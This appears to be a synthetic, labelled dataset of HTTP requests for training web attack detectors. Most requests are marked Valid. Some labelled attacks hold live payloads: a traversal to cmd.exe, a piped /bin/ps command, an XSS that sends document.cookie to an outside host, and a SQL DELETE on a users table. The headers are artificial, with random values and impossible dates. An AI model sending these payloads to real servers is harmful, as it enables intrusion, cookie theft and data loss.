If-Modified-Since: Fri, 27 Feb 09 08:59:10 CET
If-Unmodified-Since: Sun, 30 Oct 05 06:17:22 UTC
If-Match: "eYnPHNoE5lstyp5y"
If-None-Match: "vjCZhFKwbuPEfBWsh4S"
If-Range: "F-cPMiw_-B5tpGu"
Max-Forwards: 6359
MIME-Version: 0.9
Pragma: b=r
Proxy-Authorization: 6AOdei e7th1an=dmthExvp
Authorization: Basic aXBuYWg6OXBjZHJi
Range: -13602,-1959
Referer: http://www.riefdsoz.gov/A4keaEy0/coeldtul/ueenii/wheMtin.php
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.0 (X11; U; Linux i386 0.3; oe-nR; rv:5.2.8) Gecko/92376331
UA-CPU: MIPS
UA-Disp: 2389,080,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5557x706
Via: FTP/4.5 www.theaz.htm:52176
Transfer-Encoding: compress
Upgrade: lpeSTs/3.3, o5tAe/3.7
Warning: 444 www.uipl09.html "0xoea7mhe" 
X-Forwarded-For: 144.135.40.157
X-Serial-Number: 023229886351818841
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13926
Start - Id: 20223
class: Valid
GET /tmEwR5KwVQSe3k5GZ/Ee8leAiwhlwat1letgEt/eTFiRR8L9YqDv/pSatleehhetaeaGta.js?pIeDimzie=17022&replaceUFzformf=4277&8I7enLiodtdj=rywgetT1Ar%28g%25axanrcetae&scy0vnb=2328&B9@i=nlbetween&tSsl=5508&Mwhcra6kEfftz=629&giT=eK07jNy00d-%40&trcce=%28%3D%7Erw&EraomhaSidney7=e-.ADFEHgG&csl8Iallygiwqif=1BzLE6-lE7Yg&Emj=gzelenriasAEi HTTP/1.1
Host: www.nhtfv.com:80
Connection: close
Accept: application/x-tar, audio/*;q=0.8, audio/x-wav
Accept-Charset: windows-1253;q=0.0
Accept-Encoding: compress
Accept-Language: *
Cache-Control: reccwtt=ooe
Client-ip: 159.155.218.29
Cookie: QFuL%uwWnph-HX=5;iBzxc=aept;QkaE9v8uTTo=5;om7e=g.N;Ddtuta=a6s3bHdk;BZCJ=0dd%25n
Cookie2: $Version="007"
Date: Sat, 16 Jun 07 10:50:44 GMT
ETag: W/"DSsRRUMlVut_47Tfg"
Expect: 100-continue
From: 7a8pnny@to7yoS.cz
If-Modified-Since: Mon, 20 Mar 06 24:41:49 CET
If-Unmodified-Since: Mon, 18 Apr 05 18:58:06 CET
If-Match: "_zSpv35v7QPLRlX"
If-None-Match: "x.5jxUnEgxi3DO0"
If-Range: Thu, 25 Dec 08 24:30:15 CET
Max-Forwards: 7768
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest username="lseoiae3"
Authorization: Digest opaque="0sy97ps"
Range: 8-0,-1872,-4
Referer: http://etilc.it/ireo/1zelrB/k1ei.gif
TE: chunked
Trailer: If-Match
User-Agent: inla (pUCE-1Du; noD3_QTNl)
UA-CPU: 68000
UA-Disp: 7522,1953,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4940x047
Via: HTTP/0.4 www.heiAo.js, 0.6 www.h5aUmkq1.gif, 4.0 www.Tacmv.jpg
Transfer-Encoding: identity
Upgrade: ehild/2.2, sbuaee/6.5, o2oe/9.8, eape/2.8
Warning: 523 www.skkosrlA.shtml:14188 "liat" "Sat, 02 Jun 07 18:33:05 UTC"
X-Forwarded-For: 93.221.51.3
X-Serial-Number: 554046996797250
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20223
Start - Id: 29419
class: Valid
GET /thGtulasspJn9/1EWrt2Y46G/rItmfTbLNS_e975@/s9x4sagaa/7nvhwhereT/QSt_K72uwmail-9RM7/fromm3nwindow.openT/dhjnonc7/3nnoesieewptq/eQhRvE/gaiei5rmAkYlLAmrri.asp?alysloie35R=v2ei+aermdwp-ie&rwal=7odou HTTP/1.1
Host: 64.90.150.43
Connection: nenln
Accept: text/xml, image/*;q=0.9, image/*;q=0.7
Accept-Charset: iso-8859-1, iso-8859-15;q=0.7
Accept-Encoding: *
Accept-Language: sslc-So6p;q=0.3, r-B, hvzgya0h-l2;q=0.1
Cache-Control: max-stale=184
Client-ip: 214.249.83.255
Cookie: etsie=896047;chprdh3hax5ya=w58s0oZQH_eI;2theaofsr6nlrIn=emvqeSM;1JKSo5aRpXi=tm8)s;ddswt=~lsa eBdischdn
Cookie2: $Version="12"
Date: Thu, 27 Sep 07 07:22:33 GMT
ETag: W/"jMOh75yYYBefnn43znI"
Expect: 100-continue
From: suaPf@niebaoeya.org
If-Modified-Since: Mon, 03 May 10 04:48:41 GMT
If-Unmodified-Since: Mon, 06 Jul 09 04:56:18 UTC
If-Match: "Uzn5housFrE-nIB"
If-None-Match: *
If-Range: Wed, 21 Oct 09 16:34:26 UTC
Max-Forwards: 960
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM b25lc2xsYUVLZXNzbGR0b21pZXJ5YTl3YWhvZWVzdHRiaXR5aHFyZ2Rpb2tiYXJ1
Authorization: Digest realm
Range: 2-278,82-815
Referer: http://www.3ngnv.de/2fzca.js
TE: trailers
Trailer: Upgrade
User-Agent: ttrR6nmsit (sbbve1Lkc@; noTndJmov)
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 437x5082
Via: FTP/0.9 www.coBe.gif:7850, 5.9 55.38.24.34
Transfer-Encoding: identity
Upgrade: r5nsd/8.4, eecerh/9.5
Warning: 703 77.103.235.152 "rrfeeSn4cnstcAhs" "Sat, 09 May 09 09:03:00 GMT"
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 754248
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29419
Start - Id: 31183
class: Valid
GET /nJttgoe/1eptd4.shtml?xloccughgsp7teg=hup6n2&shetC=hkbeeo9&w@hN=02552&mDtWooT=fo&E1HXjjNxmetama=mep&k5andRx6ftmpmA=ks0mi&bPtmrL=rONnfi6aVd3F&stdewwd3ed=8858 HTTP/1.0
Host: 69.3.252.70
Connection: ianaae
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: we9-d, hz-scnasisn, scHadha-OomunwpN
Cache-Control: no-transform
Client-ip: 51.207.247.214
Cookie: ohenfch=262308562;p13R3dOprocessing-instructionZ=18;ZKUbinOU84=6715496;c4fnic=297788;dtsa5=u;sbloTeUsnrOm=bW5Xq
Cookie2: $Version="9"
Date: Sat, 28 Jul 07 19:53:19 UTC
ETag: "JHsdapb1As9.D7D6."
Expect: 100-continue
From: 2pun@ildgulxsU.uk
If-Modified-Since: Tue, 24 Mar 09 11:48:08 GMT
If-Unmodified-Since: Mon, 11 Feb 08 05:24:20 CET
If-Match: "-K1rn1xN1xhMYKP2kTI"
If-None-Match: *
If-Range: "@bnvwcIxEHXwQMg"
Max-Forwards: 487
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: ctTp aEEckmc=a1trp
Range: 487-253698,1-,198-1
Referer: /otHqclO.jpeg
TE: trailers,chunked;q=0.9
Trailer: Expect
User-Agent: Mozilla/6.9 (X11; U; Linux i386 3.3; d5-oe; rv:0.3.2) Gecko/53601610
UA-CPU: StrongARM
UA-Disp: 056,6829,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3376x378
Via: HTTP/0.9 241.237.132.179, 3.2 10.89.55.37
Transfer-Encoding: compress
Upgrade: brmCe/3.7, du9/1.2, int/6.8, n1wopd/2.2
Warning: 628 7.107.154.223 "19aoiihha" 
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 251100
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31183
Start - Id: 43721
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.NeabiId.de:80
Connection: idwl
Accept: */*;q=0.9
Accept-Charset: iso-8859-6;q=0.5, utf-8, utf-8;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 183.153.88.199
Cookie: xUT36scriptW9-j=trevmm;pwp-2IUHhOC9R=640;NautoexecMNr-c=ertdthtaccesaf<9AuaT\<y 1;scd7y=Ot'
Cookie2: $Version="378"
Date: Tue, 13 Sep 05 12:25:12 GMT
ETag: W/"3BJWUYYJ2ACJTUS@l"
Expect: 100-continue
From: uhbqiisi@rmieagr.org
If-Modified-Since: Mon, 26 Jan 09 15:58:05 GMT
If-Unmodified-Since: Thu, 29 Jul 04 13:53:36 GMT
If-Match: "6MjIJR6DEMj0ukCJPmRB"
If-None-Match: "jSp8@YQCCbUK0mCd-."
If-Range: "hoQrK0RDR-MuOchvHKu"
Max-Forwards: 224
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic ZGxlZVVyOnBzYWQ=
Range: 7008-71
Referer: /Oexnpa.tiff
TE: gzip,deflate
User-Agent: 6c5ueo/4.5.9.2.4
UA-CPU: 68000
UA-Disp: 603,315,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 284x7393
Via: FTP/4.5 9.210.222.206:359
Transfer-Encoding: gzip
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 140 www.rnisshet.gif "tr2eit" 
X-Forwarded-For: 175.133.115.65
X-Serial-Number: 601406
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43721
Start - Id: 20761
class: Valid
GET /nGyR@EP_qf/teEe/tn/eGor_vRoaccess_logQ4.html?troyixar7nuihc=l-%24r%27eztsgg&eeir=eawtfrno6htpxselect&oermeCcslia8uio=sS49sCf1euEl&mpu7assoC9euxus=or2imEae0aehqixj&8mrrt=%40 HTTP/1.1
Host: www.Utoerre.fr
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-2022-kr
Accept-Encoding: *
Accept-Language: osbaR-hOc, snr-sitonn4u;q=0.5, t-8oouzw;q=0.9, biEcSh-a, eebe-w;q=0.9
Cache-Control: min-fresh=00347
Client-ip: 229.232.151.157
Cookie: ersoaYmTuse=nAj1OncL5d;dlodoestjedeehI=tlFete\k2O;k9illaamomfl=61080207;nhiedgpk0teisi=6877210;epsOTqwEtrtCebi=e7
Cookie2: $Version="1"
Date: Mon, 26 May 08 03:53:00 UTC
ETag: "PU9v0v@6HeQ6P@.O@e"
Expect: esaeaee=jSehrn;dterorp=ienwi
From: txeT@aevntoegn.com
If-Modified-Since: Sat, 07 Nov 09 22:04:40 CET
If-Unmodified-Since: Sat, 11 Aug 07 01:38:19 UTC
If-Match: *
If-None-Match: "AqrtdoU5_uHBenwQ2-H-"
If-Range: Sat, 10 Feb 07 10:29:07 UTC
Max-Forwards: 041
MIME-Version: 0.0
Pragma: r='set'
Proxy-Authorization: Basic dDJhMDpJdGxlZWFo
Authorization: Digest response="3EbC9872EBdb00FfbDcebaEDD2bE293f"
Range: 802086-,4327-
Referer: /strw/et6o/l985/0qyNa/Reeeta.ace
TE: trailers,trailers
Trailer: Pragma
User-Agent: i1s6enB (oasWxK7@; h1lEFhH)
UA-CPU: StrongARM
UA-Disp: 2316,870,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2236x546
Via: HTTP/3.9 www.zuttAs.tiff
Transfer-Encoding: compress
Upgrade: on4No/1.1, ethsR/6.5, yReop/0.2, in9/6.6, japnn/5.3
Warning: 220 www.htxyn.js:56846 "tipspynata3kBht" "Tue, 15 Sep 09 04:06:34 CET"
X-Forwarded-For: 23.226.91.137
X-Serial-Number: 716222532954
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 20761
Start - Id: 27371
class: Valid
GET /nl1eIe47nt.html? HTTP/1.0
Host: www.bnR3oshEs.biz:80
Connection: close
Accept: image/*;q=0.8, image/png;q=0.4
Accept-Charset: iso-8859-8, euc-kr, hz-gb-2312
Accept-Encoding: 
Accept-Language: cra-o1, a4e-ri, vieei-ar7nnsu, e-noe, 1smo-eeels1;q=0.1
Cache-Control: only-if-cached
Client-ip: 131.181.78.228
Cookie: e2tq0egageLu=xtermuda<;yrpah5a5eddFo=9+4sircpfet1'ws2;ilemeeemh=syibi9tYRa-ei2n
Cookie2: $Version="9"
Date: Sun, 16 Oct 05 21:43:04 UTC
ETag: "5jCY2k@@4tRzfQFocI1h"
Expect: 100-continue
From: etr2@eeroi.de
If-Modified-Since: Tue, 24 May 05 17:07:08 GMT
If-Unmodified-Since: Tue, 14 Aug 07 09:41:36 UTC
If-Match: *
If-None-Match: *
If-Range: "S_.OgbssaE_LUF9_Y"
Max-Forwards: 8022
MIME-Version: 6.5
Pragma: 4='rita'
Proxy-Authorization: MeYm toondn=clnamd
Authorization: NTLM ZWFib3ZJRXNuaGFidU9ZYTRlcmVPcmV2cm43am5BdG5OZjNlbXVpZWVsaA==
Range: 5279-
Referer: /H6si/e3oisA/speoywtI/tvodbes.jsp
TE: gzip
Trailer: Expect
User-Agent: 4NK.eA http://www.itieAnb.com
UA-CPU: MIPS
UA-Disp: 4083,795,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9698x542
Via: HTTP/7.9 207.250.52.14
Transfer-Encoding: deflate
Upgrade: uroe/2.4, Rrt/3.7
Warning: 365 216.84.39.69 "lisohq8cHaNasanTe" 
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 32684294
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27371
Start - Id: 43551
class: OsCommanding
GET /rhckof7f6fyncyc/itebo4rbsdetmr.png?e2hoaOs=Oo7t&0Ajvhte1st=hlcl&jehwcepuTE2=nlghtlhdnnha&l9=%2Fbin%2Fps%2500%7C&.H5RrcpJ4t.htpass5Z=yiiietysq7A HTTP/1.0
Host: www.esshlXRoi.be:29
Connection: loiafey
Accept: text/xml, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ofa0ts-ShmtnnI, pn0-na3heiaP;q=0.2, ihi5-fbee, eo8bihc-mlsre6di, rda-TI5ef;q=0.6
Cache-Control: max-stale
Client-ip: 214.70.1.175
Cookie: ro2a05tejMk=iR;we2=ya0enAef7awsfSe;me=a1EmNmeestaaS;nn0=33347;dVnEvH54NI8=eoaoeAtsideolmee
Cookie2: $Version="425"
Date: Thu, 10 Apr 08 07:51:08 GMT
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: dtl4i@ydc3.de
If-Modified-Since: Fri, 29 Jul 05 08:43:10 GMT
If-Unmodified-Since: Thu, 29 Mar 07 05:04:12 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 805
MIME-Version: 7.0
Pragma: SRbdEojh='dtoobay'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: Basic cHR5YzczVGw6M3IzZWhyOGE=
Range: 510-
Referer: http://www.bsdacnt4.uk/seoyS/laDees.jsp
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: aMLh1mFv6 http://www.Foaigvlh.fr
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 559x227
Via: 8.5 131.17.146.193, 6.4 www.otiem0Rt.jpeg, HTTP/7.8 www.tec9.htm:6
Transfer-Encoding: deflate
Upgrade: Bo4/0.1, iai/6.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 431097380
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43551
Start - Id: 29836
class: Valid
GET /is/qxSK0HdUNhZ5hWtaz/dr0sldepses/nHDMTMowJUeS/yM/pcaCueCDFkqVfxbL/yfhetnrefj/t4Ym4tN9Ax/dHrPNeC7zcJBvd1/EtsNtasemhnangR7/CWBXc.png?-GtnZDGef3=3236&8hdbniwiern=++&b83lyrm=9092741&mrdz=ts7achorIFqit6WRlo&aaiOe=719&NdrwmAn3i=379445&le8oorRorq=dhr1w2cyzeglests2t&esycaeeosg9na=wdnoOcfatuoS7g&tpfhaeylnao=9KsxNCd HTTP/1.1
Host: www.robpasnso.fr
Connection: keep-alive
Accept: image/*;q=0.7, text/*;q=0.5, text/*
Accept-Charset: windows-1253, x-mac-hebrew, hz-gb-2312;q=0.0
Accept-Encoding: *
Accept-Language: nHue-msboz, etuq-qSedgeaa, otIt2-ytar8sou;q=0.2, giet-us, i9eoi8q-L8alqQi;q=0.3
Cache-Control: only-if-cached
Client-ip: 49.102.123.86
Cookie: me3nwroqeiftbL2=S6ni5ode4ahodwHe;RHdocumentecholetcBydivC7J=adminairwhcpr?ajgs
Cookie2: $Version="15"
Date: Wed, 09 Apr 08 21:05:17 CET
ETag: "g5A9lbqV99VONZA"
Expect: neu2n
From: rbldtdG@o7aniAtsO.ch
If-Modified-Since: Wed, 24 May 06 02:03:15 UTC
If-Unmodified-Since: Tue, 10 Apr 07 15:14:46 GMT
If-Match: "FfK8MGlMtMIx7PM"
If-None-Match: *
If-Range: "4fnWkwJOku_99fq4Bz"
Max-Forwards: 32
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: msfja kissaf=Rn4lrtpj
Authorization: czmvs lP3al=6ehaeow
Range: 9669-56204,57635-,19451-
Referer: http://www.psiqpo.st/srls/cetdzIhh.zip
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: Mozilla/2.7 (Windows; U; Win98 7.4; ro-lw; rv:7.9.9) Gecko/32678531
UA-CPU: x86
UA-Disp: 724,467,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 238x9907
Via: HTTP/3.5 www.ddoe7D.html, FTP/9.3 www.r7ba.shtml, fiay/7.1 170.71.190.133:88873
Transfer-Encoding: compress
Upgrade: erOt/8.8, dtrg5/5.2, sO4/0.6, 1jiLT/0.8
Warning: 407 224.95.62.105 "a9tsaazcrsTjarhmoi" "Thu, 13 Jul 06 11:51:43 CET"
X-Forwarded-For: 121.62.194.6
X-Serial-Number: 59564326
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 29836
Start - Id: 16645
class: Valid
GET /ws7/enWrpaf6a/od/Ntwaoetvg/hd3Omaccept3BXMm1SZd/nfreioerdrreiAIzhEws/YEtNl5C4ZX/ootK-RXqMGan/0tppxaecrx1c/.6ke4iRI0J/aeeeykrgi6Htngsuvm4.asp? HTTP/1.0
Host: 1.140.32.29:98088
Connection: ggeoi
Accept: application/postscript
Accept-Charset: iso-8859-2;q=0.8, x-mac-korean, iso-8859-4;q=0.6, koi8;q=0.8, x-mac-greek;q=0.7
Accept-Encoding: deflate, identity, gzip;q=0.8, identity;q=0.9
Accept-Language: bahynaC-sevc
Cache-Control: no-store
Client-ip: 185.9.41.179
Cookie: lo0Ntahtra=umdoaya;Fosperlu3wmE=isock_streamlo;fdtloeiGll=lfhwd;e5yvTne4Ces=ab;7M4Sib=917719;li3=51053
Cookie2: $Version="281"
Date: Tue, 05 Dec 06 08:27:06 UTC
ETag: "3bnoz3i9aeBD2wCyPlS"
Expect: 8rOrt
From: 7beimH@indn.it
If-Modified-Since: Mon, 09 May 05 14:57:44 UTC
If-Unmodified-Since: Sat, 17 Jul 04 06:43:21 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Jan 06 01:44:51 GMT
Max-Forwards: 49
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: y69e QMugoh=d2na
Authorization: NTLM b2tldXhlZWNpU2VvN2VkdG9zdWV5dW1tZXFoRW9lcmVlbnVhaHllYUQweA==
Range: 093-,-09255,0926-309
Referer: /togi/wdh4hnnh/iptiha/lqludnqf/nagsrdnn.conf
TE: deflate
Trailer: Warning
User-Agent: nloFUl1w (tzfMJfvON)
UA-CPU: x86
UA-Disp: 950,9201,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: 4.1 12.23.28.142:134
Transfer-Encoding: compress
Upgrade: n3amhi/4.3, hx6It8/3.4, tcc1Ue/2.8
Warning: 776 12.83.110.221:697 "intttghuuaPl" "Tue, 01 Mar 05 05:24:24 UTC"
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16645
Start - Id: 147
class: Valid
GET /iv0y2OpN-g6HQ5Hg_M.shtml?CSi9e=732973&u6QmaeaRty=eh5r0b&qhsphS35iheaeu=775614966&Sx@qsxp_NFm85=73817&36xtermJYG8m9UK5=4&shf9fb6wsa=rM-atwn4V&deehh=m2doos&y9ltrnfeurne=95021&aChhshirsn=%29r+nc0formhrhi%3Cc&qfxW-bWXUNw=3 HTTP/1.1
Host: www.clesr.net
Connection: close
Accept: video/*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, gzip, compress, gzip, deflate;q=0.0
Accept-Language: *;q=0.7
Cache-Control: max-age=1
Client-ip: 22.184.240.161
Cookie: Woya=lc1q_ti.La
Cookie2: $Version="4"
Date: Wed, 21 Nov 07 01:48:13 GMT
ETag: W/"SRmbQGNVW5iNXBP"
Expect: dhsaemqM=3Fntaibo
From: yiboT07e@nnhseug2l.org
If-Modified-Since: Wed, 04 May 05 17:42:00 GMT
If-Unmodified-Since: Wed, 11 Jan 06 02:19:51 UTC
If-Match: "ELvysSOjNl0bNK.OcZ"
If-None-Match: "pAlj9m.4J1bGflUz"
If-Range: "nSjtrGV8Fvbj5qSuD"
Max-Forwards: 016
MIME-Version: 6.1
Pragma: Tateh='enQrn7'
Proxy-Authorization: NTLM ZWhCaGFoOUZlZXNOZW5pOWRkNHRtOG9sbHNkZXNRaUdlUg==
Authorization: NTLM aWV0ZnlxbWVvZXRjdjRkY3JuYWVlVHVjaHNlZXVlczVuc0k1N2s=
Range: 964-,534023-,-60428
Referer: /ssenaeac.jsp
TE: gzip
Trailer: Accept
User-Agent: Mozilla/9.1 (compatible; MSIE 3.5; Linux i586; wo6ceoWAl; ailOa; tm3N)
UA-CPU: PowerPC
UA-Disp: 1257,262,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 167x694
Via: fye7/2.4 57.21.246.118, 5.4 151.94.135.49, FTP/0.6 www.eadat.jpg:7
Transfer-Encoding: deflate
Upgrade: 3ilhh/7.5, sclai/5.5, chnnyw/6.6, nlh/5.8, Fmk/0.2
Warning: 154 www.hcosnooA.png "taactmae" "Thu, 01 Oct 09 07:27:56 GMT"
X-Forwarded-For: 22.86.234.213
X-Serial-Number: 3449007851195603
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 147
Start - Id: 23908
class: Valid
GET /vQ/LKF6ve8V_G/a7JCtTl0.6fEXkj2aq/oDlTX4/e63sOHxYhaP/ewdiolMva/eaTTen/iuHKKyuz/m9iDMNf@/tdY_QP4l/h4iEtcrthscliaavesm.tiff?entCh9ts=sact%5Deei9gs4&hH3Tnn=lm&a6tldda7shta=9&fjzctsOtHewACy=2262&refeitiotwd5hed=rGlN2igma-%40&d6oshteqscLt=eC_EmiZXM2Z- HTTP/1.0
Host: www.osrEk.net
Connection: t1g6uci
Accept: text/html, video/*;q=0.1
Accept-Charset: iso-8859-1, hz-gb-2312, iso-8859-7;q=0.5, iso-8859-8-i
Accept-Encoding: *
Accept-Language: H6-itglueim, zpy-rdstq, tu-sirre3ht;q=0.2, tEastnv1-u, ia8ta-ysOsa9
Cache-Control: no-cache
Client-ip: 16.124.33.245
Cookie: hbtTiKm=61;hiTdUYlsl5stde=lahtl
Cookie2: $Version="9"
Date: Fri, 30 Jul 04 11:50:23 CET
ETag: "LQMvowedDxLcOy7jw"
Expect: 100-continue
From: gccehN@uRradmbtae.biz
If-Modified-Since: Tue, 04 Nov 08 03:23:33 CET
If-Unmodified-Since: Tue, 22 Mar 05 24:48:59 UTC
If-Match: "aBs3iuZsbeBfNWqE9HJm"
If-None-Match: "MJXNu-T-AD.fNyC"
If-Range: "NWdkdmWcqtA_RDGpb5"
Max-Forwards: 4
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 1m1o hniwe=rioiti
Authorization: Digest algorithm=MD5
Range: 9-,-0501
Referer: http://www.AFhmimd.it/ge5abut.ace
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/0.6 (X11; U; Linux i586 4.9; rg-ae; rv:9.1.7) Gecko/10629716
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7253x9892
Via: 0.5 23.102.47.220, 2.9 221.113.209.231:89484, HTTP/0.0 www.6anscx.js
Transfer-Encoding: identity
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 941 www.oEhntdsr.htm "tUs5csE0e0rt17tgQw6" 
X-Forwarded-For: 8.218.42.202
X-Serial-Number: 383867
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23908
Start - Id: 47027
class: XSS
GET /libfJ/rl5oTfibrorlrueev/yqftRJOEK/6LpV@f7.DJFg/wQ30KLcU_FIKMJec/h2uNP2gZNiZI3cj0Wr/Th06ov67tneN/mSg5ntad.png?includescriptd103bUrvlg=613&wpstncraa=5iHh&o9aadahiHA=sK1&ns6els6esu=716896178&ds=c%40xf0ts&PyvbscriptmoorK-=%26%7B%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.le.com%2Fcgi-bin%2Fgentenicge.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&e6dsOreel=58863646&rkeeynqdsTjpEte=ii0l%3A%27ei9g3&Wsrl5oaykbtcfet=81787011&8Towg0utimt=3ea3wrliuspoasu%40execb4%29&sieafaiicos0=7 HTTP/1.1
Host: www.wtetinihre.net
Connection: close
Accept: video/quicktime, video/*, image/*
Accept-Charset: iso-8859-1;q=0.9, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: cnueSr='atte'
Client-ip: 170.28.161.6
Cookie: agtlevklkf=a3;bsbuFah7hoett=e5PLl@owch9
Cookie2: $Version="7"
Date: Fri, 25 Apr 08 08:23:56 GMT
ETag: "gHWmyyEWa2M7g1jeAj39"
Expect: ntdeN6d
From: Desiah@eghc.be
If-Modified-Since: Tue, 03 Feb 04 02:18:57 GMT
If-Unmodified-Since: Sun, 12 Jul 09 23:49:52 GMT
If-Match: "ieVx5xDcPhI6G.O-4n"
If-None-Match: "CZpaCf5RW7L.av6emYQv"
If-Range: "szarhDVDUDo.5StC6mV"
Max-Forwards: 2
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: NTLM b3FraWlxdWxhc2VFdGVodDl0Y1RsYXZibmJlcG9sajV3ZXNvYnRoYXRkZmk=
Range: -0,714-,0-8516
Referer: http://www.stts1f.st/ocbn6/prgdqzH/e1oeamEt/leti/twyozk.rar
TE: trailers,chunked,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.3 (X11; U; Linux i586 5.1; iS-dx; rv:0.8.0) Gecko/77516958
UA-CPU: MIPS
UA-Disp: 5519,887,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: 5.2 www.lcle.png
Transfer-Encoding: identity
Upgrade: pil1/7.3, dxAvc/4.0
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 239527167
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47027
Start - Id: 35095
class: SqlInjection
GET /RUaR.isBLy8bIvW.swf?scriptpKVrgEe7dZ=ncNcPq&otf2mlshsmayn=3019656&en6rrty4c8n=xorLrEenpm&heltt=4&lsiAnorsSeifla=40&07hgioy=lit&ooeym4rHsiwths=ovsLy30o4d%40&ckfaat=tis&seaiSEhDftS2ed=6782206&ej9meowo=deoreeea%25Rer&gieizmwsrda=xeod&am6j38J-l=fb2cqio-a741&anneee=++services&EV0.Fvwk=5zefe HTTP/1.0
Host: 7.25.109.145
Connection: close
Accept: */*;q=0.6
Accept-Charset: ks_c_5601-1987
Accept-Encoding: gzip, compress
Accept-Language: wRsog-orf4at;q=0.1, 6sGi-tueatT;q=0.0, Gpr-eprbtct, 9x-tte
Cache-Control: only-if-cached
Cookie: euhw=aqGtomiu2j');DELETEFROMusersWHEREupper(username)  =    upper( 'admin;v1eNahpvredRn=0xcmdrs
Cookie2: $Version="8"
Date: Mon, 07 Nov 05 14:20:19 CET
If-Modified-Since: Sat, 14 Mar 09 10:38:09 GMT
If-Unmodified-Since: Fri, 21 Dec 07 17:55:08 CET
If-Match: *
If-None-Match: "qUVC7uVCrzfcwQ_U"
If-Range: "-WttUxW_SXzUUzMa"
Max-Forwards: 97
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest qop=sisnfT
Authorization: Digest opaque="Tunanti"
Referer: /d6Ie5/hpOamD4e/teimdede.tiff
User-Agent: nr8lno2a (eiQh8nd; eTG8ry6; 6UKtfzE; oVhh8meKNx; rakJZvaWwZ)
UA-Pixels: 712x637
Via: HTTP/9.0 225.212.89.177
Transfer-Encoding: deflate
Warning: 935 www.yeac.htm "gBreee8yeh7aryso17t" "Mon, 01 Jan 07 23:21:49 CET"
